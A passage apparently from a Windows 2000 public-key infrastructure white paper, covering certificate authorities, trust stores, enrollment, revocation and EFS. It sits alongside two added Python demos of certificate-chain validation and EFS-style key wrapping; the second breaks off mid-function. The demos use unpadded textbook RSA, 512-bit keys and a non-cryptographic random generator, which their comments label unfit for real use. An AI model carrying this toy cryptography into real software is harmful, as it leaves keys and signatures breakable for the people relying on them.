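The chain Alice builds in the Trust and Validation section above (Bob's certificate, issued by the CA Ira, which is in turn certified by a root Alice explicitly trusts), worked through in code. This is an added example and not code from the white paper or from Windows 2000: the textbook RSA signing, the dict-based certificate fields and the names "Root CA", "Ira", "Bob" and "Mallory" are constructed stand-ins for a CryptoAPI CSP and X.509/DER, used only to keep the example self-contained.

```python
import hashlib
import json
import random

# Textbook RSA over a SHA-256 digest: a constructed stand-in for a CryptoAPI CSP.
# No padding and 512-bit keys keep the demo short; neither is acceptable in real use.

def is_probable_prime(n, rounds=25):
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):  # Miller-Rabin
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def random_prime(bits):
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1  # force top bit and oddness
        if is_probable_prime(cand):
            return cand

def generate_keypair(bits=512):
    """Return (public, private) key dicts. e is prime, so phi % e != 0 means gcd(e, phi) == 1."""
    e = 65537
    while True:
        p, q = random_prime(bits // 2), random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            break
    return {"n": p * q, "e": e}, {"n": p * q, "d": pow(e, -1, phi)}

def digest_int(data):
    return int.from_bytes(hashlib.sha256(data).digest(), "big")

def sign(private, data):
    return pow(digest_int(data), private["d"], private["n"])

def verify(public, data, signature):
    return pow(signature, public["e"], public["n"]) == digest_int(data)

# A certificate: a statement binding a subject name to a subject public key, signed with
# the issuer's private key. A dict in canonical JSON stands in for X.509/DER.

def tbs_bytes(cert):
    """Canonical encoding of the to-be-signed fields."""
    return json.dumps(cert["tbs"], sort_keys=True).encode()

def issue_certificate(subject, subject_public, is_ca, issuer_name, issuer_private):
    cert = {"tbs": {"subject": subject, "issuer": issuer_name,
                    "public_key": subject_public, "is_ca": is_ca}}
    cert["signature"] = sign(issuer_private, tbs_bytes(cert))
    return cert

def validate_chain(chain, trusted_roots):
    """chain[0] is the end-entity certificate, chain[-1] the root. Every link must pass the
    paper's tests (issuer signature verifies, names bind, issuer is a CA) and the chain must
    end in a self-signed certificate held in the caller's trusted root store. Returns (ok, reason)."""
    for child, parent in zip(chain, chain[1:]):
        who, issuer = child["tbs"]["subject"], parent["tbs"]["subject"]
        if child["tbs"]["issuer"] != issuer:
            return False, f"{who}: issuer name does not match the next certificate"
        if not parent["tbs"]["is_ca"]:
            return False, f"{who}: issuer {issuer} is not a CA"
        if not verify(parent["tbs"]["public_key"], tbs_bytes(child), child["signature"]):
            return False, f"{who}: signature by {issuer} does not verify"
    root = chain[-1]
    if root["tbs"]["subject"] != root["tbs"]["issuer"] or not verify(
            root["tbs"]["public_key"], tbs_bytes(root), root["signature"]):
        return False, "chain does not end in a self-signed certificate"
    if tbs_bytes(root) not in {tbs_bytes(c) for c in trusted_roots}:
        return False, f"root {root['tbs']['subject']} is not in the trusted root store"
    return True, "chain verified"

def build_demo():
    """Constructed hierarchy: root CA -> issuing CA 'Ira' -> end entity 'Bob'."""
    root_pub, root_priv = generate_keypair()
    ira_pub, ira_priv = generate_keypair()
    bob_pub, _bob_priv = generate_keypair()
    root = issue_certificate("Root CA", root_pub, True, "Root CA", root_priv)
    ira = issue_certificate("Ira", ira_pub, True, "Root CA", root_priv)
    bob = issue_certificate("Bob", bob_pub, False, "Ira", ira_priv)
    return bob, ira, root

if __name__ == "__main__":
    bob, ira, root = build_demo()
    print(validate_chain([bob, ira, root], [root]))  # → (True, 'chain verified')
    forged = {"tbs": dict(bob["tbs"], subject="Mallory"), "signature": bob["signature"]}
    print(validate_chain([forged, ira, root], [root]))  # relabelled cert: Ira's signature fails
    print(validate_chain([bob, ira, root], []))  # same chain, but Alice's ROOT store is empty
```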
This is a logical view and does not imply physical requirements for separate servers; in fact, many functions may be combined on a single-server system.

A key element in the PKI is Microsoft Certificate Services. This allows you to deploy one or more enterprise CAs. These CAs support certificate issuance and revocation. They are integrated with Active Directory, which provides CA location information and CA policy, and allows certificates and revocation information to be published.

The PKI does not replace the existing Windows domain trust-and-authorization mechanisms based on the domain controller (DC) and Kerberos Key Distribution Center (KDC). Rather, the PKI works with these services and provides enhancements that allow applications to readily scale to address extranet and Internet requirements. In particular, PKI addresses the need for scalable and distributed identification and authentication, integrity, and confidentiality.

Figure 1. Windows 2000 public-key infrastructure components

Support for creating, deploying, and managing PK-based applications is provided uniformly on workstations and servers running Windows 2000 or Windows NT, as well as workstations running Windows 95 and Windows 98 operating systems. Figure 2 provides an overview of these services.

Microsoft CryptoAPI is the cornerstone for these services. It provides a standard interface to cryptographic functionality supplied by installable cryptographic service providers (CSPs). These CSPs may be software-based or take advantage of cryptographic hardware devices and can support a variety of algorithms and key strengths. As indicated in the figure, one possible hardware-based CSP supports smart cards. Some CSPs that ship with Windows 2000 take advantage of the Microsoft PC/SC-compliant smart card infrastructure (see http://www.Microsoft.com/smartcard/ and http://www.smartcardsys.com/).

Layered on the cryptographic services is a set of certificate management services.
These support X.509 version 3 standard certificates, providing persistent storage, enumeration services, and decoding support. Finally, there are services for dealing with industry-standard message formats. Primarily, these support the PKCS standards and evolving Internet Engineering Task Force (IETF) Public Key Infrastructure, X.509 (PKIX) draft standards.

Other services take advantage of CryptoAPI to provide additional functionality for application developers. Secure Channel (schannel) supports network authentication and encryption using the industry standard TLS and SSL protocols. These may be accessed using the Microsoft WinInet interface for use with the HTTP protocol (HTTPS) and with other protocols through the SSPI interface. Authenticode supports object signing and verification. This is used principally for determining origin and integrity of components downloaded over the Internet, though it may be used in other environments. Finally, general-purpose smart-card interfaces are supported. These are used to integrate cryptographic smart cards in an application-independent manner and are the basis for the smart-card logon support that is integrated with Windows 2000.

Figure 2. Public-key application services

Certificate Authorities

Microsoft Certificate Services, included with Windows 2000, provides a means for an enterprise to easily establish CAs to support its business requirements. Certificate Services includes a default policy module that is suitable for issuing certificates to enterprise entities (users, computers, or services). This includes identification of the requesting entity and validation that the certificate requested is allowed under the domain PK security policy. This may be easily modified or enhanced to address other policy considerations or to extend CA support for various extranet or Internet scenarios. Since Certificate Services is standards-based, it provides broad support for PK-enabled applications in heterogeneous environments.
Within the PKI, you can easily support both enterprise CAs and external CAs, such as those associated with other organizations or commercial service providers. This allows an enterprise to tailor its environment in response to business requirements.

Certificate Hierarchies

The Windows 2000 PKI assumes a hierarchical CA model. This was chosen for its scalability, ease of administration, and consistency with a growing number of commercial and third-party CA products. In its simplest form, a CA hierarchy consists of a single CA, though in general, a hierarchy contains multiple CAs with clearly defined parent-child relationships, as shown in Figure 3. As shown, there may be multiple unconnected hierarchies of interest. There is no requirement that all CAs share a common top-level CA parent (or root).

In this model, children are certified by parent CA–issued certificates, which bind a CA's public key to its identity and other policy-driven attributes. The CA at the top of a hierarchy is generally referred to as a root CA. The subordinate CAs are often referred to as intermediate or issuing CAs. In this paper, a CA that issues end-entity certificates is called an issuing CA. Intermediate CA refers to a CA that is not a root CA, but that only certifies other CAs.

Figure 3. Certificate authority hierarchies

The fundamental advantage of this model is that verification of certificates requires trust in only a relatively small number of root CAs. At the same time, it provides flexibility in the number of issuing CAs. There are several practical reasons for supporting multiple issuing CAs. These include:

- Usage—Certificates may be issued for a number of purposes (for example, secure e-mail, network authentication, and so on). The issuing policy for these uses may be distinct, and separation provides a basis for administering these policies.
- Organizational divisions—There may be different policies for issuing certificates, depending upon an entity's role in the organization.
Again, you can create issuing CAs to separate and administer these policies.
- Geographic divisions—Organizations may have entities at multiple physical sites. Network connectivity between these sites may dictate a requirement for multiple issuing CAs to meet usability requirements.

Such a CA hierarchy also provides administrative benefits, including:

- Flexible configuration of CA security environment (key strength, physical protection, protection against network attacks, and so on) to tailor the balance between security and usability. For example, you may choose to employ special-purpose cryptographic hardware on a root CA, operate it in a physically secure area, or operate it offline. These may be unacceptable for issuing CAs, due to cost or usability considerations.
- Use of fairly frequent updates for issuing CA keys and/or certificates, which are the most exposed to compromise, without requiring a change to established trust relationships.
- The ability to turn off a specific portion of the CA hierarchy without affecting the established trust relationships. For example, you can easily shut down and revoke an issuing CA certificate associated with a specific geographic site without affecting other parts of the organization.

In general, CA hierarchies tend to be static, though this is not a requirement. You can add or delete issuing CAs under a given root CA fairly easily. You can also merge existing CA hierarchies by issuing a certificate from one of the root CAs certifying the other root as an intermediate CA. However, before doing this, you should carefully consider policy inconsistencies that this could introduce and the impact of depth constraints that may be encoded into existing certificates.

Deploying an Enterprise CA

Deploying Microsoft Certificate Services is a fairly straightforward operation. It is recommended that you establish the domain prior to creating a CA. Then establish an enterprise root CA, or CAs.
The Certificate Services installation process walks the administrator through this process. Key elements in this process include:

- Selecting the host server—The root CA can run on any Windows 2000 Server platform, including a domain controller. Factors such as physical security requirements, expected loading, connectivity requirements, and so on, should be considered in making this decision.
- Naming—CA names are bound into their certificates and hence cannot change. You should consider factors such as organizational naming conventions and future requirements to distinguish among issuing CAs.
- Key generation—The CA's public-key pair is generated during the installation process and is unique to this CA.
- CA certificate—For a root CA, the installation process automatically generates a self-signed CA certificate, using the CA's public/private-key pair. For a child CA, a certificate request can be generated that may be submitted to an intermediate or root CA.
- Active Directory integration—Information concerning the CA is written into a CA object in the Active Directory during installation. This provides information to domain clients about available CAs and the types of certificates that they issue.
- Issuing policy—The enterprise CA setup automatically installs and configures the Microsoft-supplied Enterprise Policy Module for the CA. An authorized administrator can modify the policy, although in most cases this is not necessary.

After a root CA has been established, it is possible to install intermediate or issuing CAs subordinate to this root CA. The only significant difference in the installation process is that a certificate request is generated for submission to a root or intermediate CA. This request may be routed automatically to online CAs located through the Active Directory, or routed manually in an offline scenario. In either case, the resultant certificate must be installed at the CA before it can begin operation.
There is an obvious relationship between the enterprise CAs and the Windows 2000 domain trust model, but this does not imply a direct mapping between CA trust relationships and domain trust relationships. Nothing prevents a single CA from servicing entities in multiple domains, or even entities outside the domain boundary. Similarly, a domain may have multiple enterprise CAs.

CAs are high-value resources, and it is often desirable to provide them with a high degree of protection, as discussed above. Specific actions that should be considered include:

- Physical protection—Since CAs represent highly trusted entities within an enterprise, protect them from tampering. This requirement is dependent upon the inherent value of the certification made by the CA. Physical isolation of the CA server, in a facility accessible only to security administrators, can dramatically reduce the possibility of such attacks.
- Key management—The CA keys are its most valuable asset because the private key provides the basis for trust in the certification process. Cryptographic hardware modules (accessible to Certificate Services through a CryptoAPI CSP) can provide tamper-resistant key storage and isolate the cryptographic operations from other software that is running on the server. This significantly reduces the likelihood that a CA key will be compromised.
- Restoration—Loss of a CA due to hardware failure, for example, can create a number of administrative and operational problems, as well as prevent revocation of existing certificates. Certificate Services supports backup of a CA instance so that it can be restored at a later time. This is an important part of the overall CA management process.

Trust In Multiple CA Hierarchies

Based on the preceding discussion, it is evident that the Windows 2000 PKI must deal with trust relationships across multiple CA hierarchies.
This could involve only CA hierarchies within a single enterprise, but may involve hierarchies within multiple enterprises, as well as commercial CAs (such as VeriSign, Thawte, and others).

Within the PKI, you can administratively establish and enforce CA-based trust relationships based on the Windows 2000 domain policy objects. For each trusted root CA, the system provides a means to apply usage restrictions on certificates that are issued by the CA. For example, you could choose to validate only certificates that are issued by a CA for server authentication, even if the CA issues certificates for several purposes. In addition, individual users can add CA trust relationships that apply only to themselves. This is done using client functionality and does not involve administrative action.

An alternative to explicitly including all trusted root CAs in a policy object is to use cross certificates. These have been used by at least one vendor's PKI product and provide a means to create a chain of trust from a single, trusted, root CA to multiple other CAs. Windows 2000 PKI is capable of processing such cross certificates and using them in making trust decisions, but they are unnecessary in this model. Microsoft chose this approach because of the issues that cross certificates raise, notably:

- Uncertain interpretation of cross certification across organization boundaries when the CAs implement disparate policies.
- Interpretation of cross certification in the absence of existing business agreements covering their use.
- Additional administrative burden of generating and maintaining cross certificates.

Enabling Domain Clients

Windows 2000 provides a comprehensive set of core services supporting the development and deployment of interoperable PK-based applications. These core services are also available on Windows NT 4.0, Windows 98, and Windows 95.
The most significant new feature of the Windows 2000 implementation is integration with the domain administration and policy model, dramatically simplifying application management within the enterprise. The remainder of this section discusses the core application services that are provided by the PKI.

Generating Keys

Use of PK technology is dependent upon the ability to generate and manage keys for one or more PK algorithms. The Microsoft CryptoAPI supports installable CSPs that support key generation and management for a variety of cryptographic algorithms. The CryptoAPI defines standard interfaces for generating and managing keys that are the same for all CSPs.

Mechanisms for storing key material are dependent on the selected CSP. The Microsoft-provided software CSPs (or base CSPs) store key material in an encrypted form on a per-user or per-computer basis. They also support control over public-key pair exportability (CRYPT_EXPORTABLE flag) and usage control (CRYPT_USER_PROTECT flag). The former controls private-key export from the CSP; the latter determines user-notification behavior when an application attempts to use the private key.

Other CSPs may implement different mechanisms. For example, smart card CSPs store the public-key pair in the smart card tamper-resistant hardware and generally require entry of a PIN code to access operations involving the private key. These protection mechanisms are transparent to an application, which references all key pairs through a key-set name that is unique in the context of a CSP.

Key Recovery

The CryptoAPI architecture is compatible with, but does not mandate, key recovery. In this context, key recovery implies persistent storage of an entity's private key, allowing access by authorized individuals without knowledge or consent of the owning entity. Typically, this is necessary to ensure access to critical business correspondence or to meet law-enforcement requirements.
Key recovery is useful only when applied to keys that are used in the encryption of persistent data. For PK-based applications, this usually implies an entity's key-exchange keys. There is questionable value, and considerable danger, in archiving identification or digital-signature private keys because their only practical use would be for impersonation of the private key owner.

Microsoft Exchange currently provides support for recovery of key-exchange keys so that encrypted e-mail can be read. In addition, third-party CSPs are available that provide general support for key recovery. Microsoft may include additional key-recovery functionality in the future, depending upon customer demand.

Certificate Enrollment

As mentioned, practical use of PK-based technology generally relies on certificates to bind public keys to known entities. The Windows 2000 PKI supports certificate enrollment to the Microsoft enterprise CA or third-party CAs. Enrollment support is implemented in a transport-independent manner and is based on use of industry-standard PKCS-10 certificate request messages and PKCS-7 responses containing the resulting certificate or certificate chain. At this time, certificates that support RSA keys and signatures, Digital Signature Algorithm (DSA) keys and signatures, and Diffie-Hellman keys are supported.

Support for PKCS-10 and PKCS-7 messages is provided by a Microsoft-supplied enrollment control (Xenroll.dll), which can be scripted for Web-based enrollment or called programmatically to support other transport mechanisms, such as RPC, DCOM, and e-mail. This control allows the calling application to specify the attributes included in the PKCS-10 message and allows use of an existing key pair or generation of a new key pair. The enrollment process is assumed to be asynchronous, and the enrollment control provides state management to match issued certificates against pending requests.
This provides a means of creating an internal binding between the certificate, the CSP that generated the key pair, and the key-pair container name. The PKI supports multiple enrollment methods, including Web-based enrollment, an enrollment wizard, and policy-driven auto-enrollment, which occurs as part of a user's logon processing. In the future, the certificate enrollment process will evolve in a manner consistent with the Certificate Request Syntax (CRS) draft current in the IETF PKIX working group.

Renewal

Certificate renewal is conceptually similar to enrollment, but takes advantage of the trust relationship inherent in an existing certificate. Renewal assumes that the requesting entity wants a new certificate with the same attributes as an existing, valid certificate, but with extended validity dates. A renewal may use the existing public key or a new public key. Renewal is of advantage primarily to the CA. A renewal request can presumably be processed more efficiently since the existing certificate attributes need not be reverified. Renewal is currently supported in the Windows 2000 PKI for automatically enrolled certificates. For other mechanisms, a renewal is treated as a new enrollment request. Industry-standard message protocols for certificate renewal are not yet defined, but are included in the IETF PKIX CRS draft. Once these standards are ratified, Microsoft plans to implement the associated message formats.

Using Keys and Certificates

Within the Microsoft PKI, cryptographic keys and associated certificates are stored and managed by the CryptoAPI subsystem. As noted, keys are managed by CSPs, and certificates are managed by the CryptoAPI certificate stores. The certificate stores are repositories for certificates and their associated properties. By convention, the PKI defines five standard certificate stores:

MY—This store is used to hold a user's or computer's certificates for which the associated private key is available.
CA—This store is used to hold issuing or intermediate CA certificates to use in building certificate-verification chains.

TRUST—This store is used to hold Certificate Trust Lists (CTLs). These are an alternate mechanism that allows an administrator to specify a collection of trusted CAs. An advantage is that they may be transmitted over nonsecure links, because they are digitally signed.

ROOT—This store holds only self-signed CA certificates for trusted root CAs.

UserDS—This store provides a logical view of a certificate repository that is stored in the Active Directory (for example, in the userCertificate property of the User object). Its purpose is to simplify access to these external repositories.

These are logical stores that can present a consistent, system-wide view of the available certificates that may reside on multiple physical stores (hard disk, smart cards, and so on). By using these services, applications can share certificates and are assured of consistent operation under administrative policy. The certificate management functions support decoding of X.509 v3 certificates and provide enumeration functions to assist in locating a specific certificate. To simplify application development, the MY store maintains certificate properties that indicate the CSP and key-set name for the associated private key. Once an application has selected a certificate to use, it can use this information to obtain a CSP context for the correct private key.

Recovery

Public key pairs and certificates tend to have high value. If they are lost due to system failure, their replacement may be time consuming and expensive. Therefore, the Windows 2000 PKI supports the ability to back up and restore both certificates and associated key pairs through the certificate-management administrative tools. When exporting a certificate, using the certificate manager, the user must specify whether to also export the associated key pair.
If this option is selected, the information is exported as an encrypted (based on a user-supplied password) PKCS-12 message. This may later be imported to the system, or another system, to restore the certificate and keys. This operation assumes that the key pair is exportable by the CSP. This is true for the Microsoft base CSPs if the exportable flag was set at key generation. Third-party CSPs may or may not support private key export. For example, smart card CSPs do not generally support this operation. For software CSPs with nonexportable keys, the alternative is to maintain a complete system-image backup, including all registry information.

Roaming

Roaming in the context of this paper means the ability to use the same PK-based applications on different computers within the enterprise Windows environment. The principal requirement is to make a user's cryptographic keys and certificates available wherever he or she logs on. The Windows 2000 PKI supports this in two ways. First, if the Microsoft base CSPs are used, roaming of keys and certificates is supported by the roaming profile mechanism. This is transparent to the user once roaming profiles are enabled. It is unlikely that this functionality will be supported by third-party CSPs because they generally use a different method of preserving key data, often on hardware devices. Second, hardware token devices, such as smart cards, support roaming, provided that they incorporate a physical certificate store. The smart card CSPs that ship with the Windows 2000 platform support this functionality. The user carries the hardware token to the new location.

Revocation

Certificates tend to be long-lived credentials, and there are a number of reasons why these credentials may become untrustworthy prior to their expiration. Examples include:

Compromise, or suspected compromise, of an entity's private key.
Fraud in obtaining the certificate.
Change in status.
PK-based functionality assumes distributed verification in which there is no need for direct communication with a central trusted entity that vouches for these credentials. This creates a need for revocation information that can be distributed to individuals attempting to verify certificates. The need for revocation information, and its timeliness, is dependent upon the application. To support a variety of operational factors, the Windows 2000 PKI incorporates support of industry-standard Certificate Revocation Lists (CRLs). Enterprise CAs support certificate revocation and CRL publication to the Active Directory under administrative control. Domain clients can obtain this information and cache it locally to use when verifying certificates. This same mechanism supports CRLs published by commercial CAs or third-party certificate server products, provided that the published CRLs are accessible to clients over the network.

Trust

The principal client trust concern when using PK-based functionality is the trust associated with certificate verification. This is generally based on the trust associated with the CA that issued the certificate. As discussed, the PKI assumes a rooted CA hierarchy in which the control of trust is based on decisions concerning root CAs. If a specified end-entity certificate can be shown to chain to a known trusted root CA, and if the intended certificate usage is consistent with the application context, it is considered valid. If either of these conditions is not present, it is considered invalid. Within the PKI, users may make trust decisions that affect only themselves. They do this by installing or deleting trusted root CAs and configuring associated usage restrictions with the certificate-management administrative tools. This should be the exception, rather than the rule. These trust relationships should be established as part of the enterprise policy (see the following section, PK Security Policy in Windows 2000).
Trust relationships established by policy are automatically propagated to Windows 2000–based client computers.

PK Security Policy in Windows 2000

Security policies can be applied to sites, domains, or organizational units (OUs), and affect the associated security groups of users and computers. PK security policy is only one aspect of the overall Windows security policy and is integrated into this structure. It provides a mechanism to centrally define and manage policy, while enforcing it globally. The most significant aspects of PK security policy are discussed below.

Trusted CA Roots

Trust in root CAs may be set by policy to establish trust relationships used by domain clients in verifying PK certificates. The set of trusted CAs is configured using the Group Policy Editor. It can be configured on a per-computer basis and apply globally to all users of that computer. In addition to establishing a root CA as trusted, the administrator can set usage properties associated with the CA. If specified, these restrict the purposes for which the CA-issued certificates are valid. Restrictions are specified based on object identifiers (OIDs) as defined for ExtendedKeyUsage extensions in the IETF PKIX Part 1 draft. Currently, these provide a means of restricting use to any combination of the following:

Server authentication
Client authentication
Code signing
E-mail
IP Security (IPSec) end system
IPSec tunnel
IPSec user
Time-stamping
Microsoft Encrypted File System

Certificate Enrollment and Renewal

As part of the overall PKI integration with Windows 2000, policy mechanisms have been defined to support an automated certificate enrollment process. This is controlled by two key elements: certificate types and auto-enrollment objects. These are integrated with the Group Policy Object and may be defined on a site, domain, OU, computer, or user basis. Certificate types provide a template for a certificate and associate it with a common name, for ease of administration.
The template defines elements such as naming requirements, validity period, allowable CSPs for private key generation, algorithms, and extensions that should be incorporated into the certificate. The certificate types are logically separated into computer and user types and applied to the policy objects accordingly. Once defined, these certificate types are available for use with the auto-enrollment objects and certificate-enrollment wizard. This mechanism is not a replacement for the enterprise CA issuing policy, but is integrated with it. The CA service receives a set of certificate types as part of its policy object. These are used by the Enterprise Policy Module to define the types of certificates that the CA is allowed to issue. The CA rejects requests for certificates that fail to match these criteria. The auto-enrollment object defines policy for certificates that an entity in the domain should have. This can be applied on a computer and user basis. The types of certificates are incorporated by reference to the certificate type objects and may be any defined type. The auto-enrollment object provides sufficient information to determine whether an entity has the required certificates and to enroll for those certificates with an enterprise CA, if they are missing. The auto-enrollment objects also define policy on certificate renewal. This can be set by an administrator to occur before certificate expiration, supporting long-term operation without direct user action. The auto-enrollment objects are processed and any required actions taken whenever policy is refreshed (logon time, GPO refresh, and so on).

Smart-Card Logon

Smart-card logon (also see the section on smart-card logon in the Applications Overview section below) is controlled by policy associated with the user object in a manner analogous to password policy. Policy may be set either to enable smart-card logon, in which case password-based logon may still be used, or to enforce smart-card logon.
In the latter case, protection against unauthorized access to the account is significantly stronger. It does mean, however, that users are unable to log on if they forget their smart card or attempt to use a computer lacking a smart-card reader.

Applications Overview

This section provides an overview of significant applications that currently take advantage of PK-based functionality. It is intended to serve as an introduction to the ways you can use PKI to solve real-world business needs.

Web Security

The Web has rapidly become a key element in creating and deploying solutions for the effective exchange of information on a worldwide basis. In particular, growth in its use for business purposes has been dramatic. For many uses, security is a key consideration. Notably:

Server authentication—To enable clients to verify the server they are communicating with.
Client authentication—To allow servers to verify the client's identity and use this as a basis for access-control decisions.
Confidentiality—Encryption of data between clients and servers to prevent its exposure over public Internet links.

The Secure Sockets Layer (SSL) and the emerging IETF standard Transport Layer Security (TLS) protocols play an important role in addressing these needs. SSL and TLS are flexible security protocols that can be layered on top of other transport protocols. They rely on PK-based authentication technology and use PK-based key negotiation to generate a unique encryption key for each client/server session. They are most commonly associated with Web-based applications and the HTTP protocol (referred to as HTTPS). SSL and TLS are supported on the Windows platform by the secure channel (Schannel) SSPI provider. Microsoft Internet Explorer and Internet Information Services both use Schannel for this functionality. Because Schannel is integrated with Microsoft's SSPI architecture, it is available for use with multiple protocols to support authenticated and/or encrypted communications.
Taking full advantage of the SSL and TLS protocols requires both clients and servers to have identification certificates issued by mutually trusted CAs, allowing the parties to authenticate each other. In this mode, certificates are exchanged along with data that proves possession of the corresponding private key. Each side can then validate the certificate and verify possession of the private key, using the certificate's public key. The identifying information included in the certificate can then be used to make supplemental access-control decisions. For example, the client can decide whether the server is someone that it wishes to conduct business with, and the server can decide what data the client can access. Windows 2000 PKI integrates support for the latter decisions as a standard feature of Windows 2000 Server. User certificates can be mapped on a one-to-one or many-to-one basis against security principals (User objects) in the Active Directory. Schannel can take advantage of this information to automatically synthesize a security token for the client so that the Windows ACL mechanisms are used to enforce access control to resources. This is advantageous for services because they can use the identical access-control mechanism independent of the client-authentication mechanism used (PK or Kerberos). Once the client and server have authenticated each other, they can negotiate a session key and begin communicating securely. SSL and TLS are also often employed in a mode that does not require client authentication. Use of mutual authentication is recommended in the enterprise environment, however, because it allows you to make use of the Windows-based access control mechanisms. Also, the PKI significantly simplifies certificate enrollment and management, reducing the burden on the client.

Secure E-mail

PK-based secure e-mail products, including Microsoft Exchange, have been available for a number of years and are widely deployed.
These systems rely on PK technology for:

Digital signatures, to prove origin and authenticity of an e-mail message.
Bulk encryption without prior shared secrets, for confidentiality between correspondents.

The distributed nature of e-mail, and the reliance on store-and-forward transport to multiple recipients, have been decisive factors in the use of PK technology. Alternate approaches, based on shared-secret cryptography, impose administrative and physical security requirements that make them difficult to use. A limitation of some early implementations was the lack of cross-vendor interoperability. In the absence of suitable standards, vendors implemented systems that relied on proprietary protocols, message encodings, and trust assumptions that effectively defined non-interoperable PKIs. (PGP, though in fairly wide use, is in this category because its messaging formats never became a basis for interoperable secure e-mail applications within the industry at large.) Only recently has a basis for interoperable secure e-mail systems emerged from major vendors, with the proposed IETF S/MIME version 3 standard, which builds upon the S/MIME version 2 proposal from RSA Data Security. Despite its draft status, S/MIME is currently implemented by a number of products, including the Microsoft Outlook® 98 messaging and collaboration client and Microsoft Outlook Express, with proven interoperability between vendors for PK encryption and digital signatures, using RSA algorithms. In operation, these systems use a user's private key to digitally sign outgoing e-mail. The user's certificate is then sent along with the e-mail so that the recipient can verify the signature. S/MIME defines a profile for these certificates to ensure interoperability and assumes a hierarchical CA model to provide scalable trust management. To encrypt e-mail, the user obtains the encryption certificate of the recipient, either from prior e-mail or a directory service.
Once this certificate is verified, the user can use the contained public key to encrypt the secret key used to encrypt the e-mail.

Digitally Signed Content

The growing use of the Internet has driven reliance on downloaded active content, such as Windows-based applications, ActiveX® controls, and Java applets. The result has been a heightened concern for the safety of such downloads, since they often occur as a side effect of Web scripts without any specific user notification. In response to these concerns, Microsoft introduced Authenticode(TM) digital signature technology in 1996 and introduced significant enhancements in 1997. Authenticode technology allows software publishers to digitally sign any form of active content, including multiple-file archives. These signatures may be used to verify both the publishers of the content and the content integrity at download time. This verification infrastructure scales to the worldwide base of users of Windows by relying on a hierarchical CA structure in which a small number of commercial CAs issue software-publishing certificates. For enterprise needs, the Windows 2000 PKI allows you to issue Authenticode certificates to internal developers or contractors and allows any employee to verify the origin and integrity of downloaded applications.

Encrypting File System

The Windows 2000 Encrypting File System (EFS) supports transparent encryption and decryption of files stored on a disk in the Windows NT file system (NTFS). The user can designate individual files to encrypt or folders whose contents are to be maintained in encrypted form. Applications have access to a user's encrypted files in the same manner as unencrypted files. However, they cannot decrypt any other user's encrypted files. EFS makes extensive use of PK-based technology to provide mechanisms for encrypting files to multiple users as well as supporting file recovery.
To do this, it utilizes the ability of PK to support bulk encryption without prior shared secrets. In operation, each EFS user generates a public-key pair and obtains an EFS certificate. The certificate is issued by an enterprise CA in the Windows 2000 domain, although EFS generates a self-signed certificate for stand-alone operation where data sharing is not an issue. In addition, Windows 2000 supports an EFS recovery policy in which trusted recovery agents can be designated. These agents generate an EFS recovery public-key pair and are issued an EFS recovery certificate by the enterprise CA. The certificates of the EFS recovery agents are published to domain clients with the Group Policy object. In operation, for each file to be encrypted, EFS creates a random key that is used to encrypt the file. The user's EFS public key is then used to encrypt this secret key and associate it with the file. In addition, a copy of the secret key, encrypted with each recovery agent's EFS public key, is associated with the file. No plaintext copy of the secret key is stored in the system. When retrieving the file, EFS transparently unwraps the copy of the secret key encrypted with the user's public key, using the user's private key. This is then used to decrypt the file in real time during file read and write operations. Similarly, a recovery agent may decrypt the file by using the private key to access the secret key.

Smart-Card Logon

Windows 2000 introduces PK-based smart-card logon as an alternative to passwords for domain authentication. This relies on a PC/SC Workgroup-compliant smart-card infrastructure, first introduced for Windows NT and Windows 95 in December 1997, and RSA-capable smart cards with supporting CryptoAPI CSPs. The authentication process makes use of the PKINIT protocol, proposed by the IETF Kerberos working group, to integrate PK-based authentication with the Windows 2000 Kerberos access-control system.
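The S/MIME encryption step and the EFS file-key handling described above share one structure: a fresh random content key encrypts the data once, and that key is then wrapped separately under each party's public key, so the owner, every recipient or recovery agent can open the data while no plaintext copy of the key is stored. The example below is added here and is not Microsoft's EFS or Exchange code. To run on the standard library alone it uses stand-ins that are labelled as such: textbook RSA without padding plays the CSP's RSA key-exchange operation, and a SHA-256 counter-mode keystream plays the bulk cipher. Neither is fit for production use; the Data Decryption Field / Data Recovery Field structure, not the primitives, is what it demonstrates. All names and key sizes are constructed for the example.

```python
"""Added example (not Microsoft code): EFS/S/MIME style key wrapping.
A random file key encrypts the data; copies of that key are wrapped under
the owner's public key (DDF) and each recovery agent's public key (DRF).
Stand-ins: textbook RSA for the CSP's key exchange, SHA-256 CTR for DESX.
"""
import hashlib
import secrets
from dataclasses import dataclass
from typing import Dict, Tuple


def _is_probable_prime(n: int, rounds: int = 24) -> bool:
    """Miller-Rabin test, adequate for generating the example's toy keys."""
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int) -> int:
    while True:
        candidate = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(candidate):
            return candidate


@dataclass(frozen=True)
class KeyPair:
    n: int
    e: int
    d: int          # private exponent; in EFS this never leaves the user's CSP


def generate_keypair(bits: int = 512) -> KeyPair:
    """Toy RSA key generation standing in for the CSP's key generation."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return KeyPair(p * q, e, pow(e, -1, phi))


def wrap_key(key: bytes, pub: KeyPair) -> int:
    """Encrypt a content key under a public key (a real CSP pads per PKCS#1)."""
    m = int.from_bytes(key, "big")
    assert m < pub.n, "content key must be shorter than the modulus"
    return pow(m, pub.e, pub.n)


def unwrap_key(wrapped: int, priv: KeyPair, key_len: int = 16) -> bytes:
    return pow(wrapped, priv.d, priv.n).to_bytes(key_len, "big")


def _keystream_xor(key: bytes, data: bytes) -> bytes:
    """Counter-mode keystream from SHA-256; symmetric, so it also decrypts."""
    out = bytearray()
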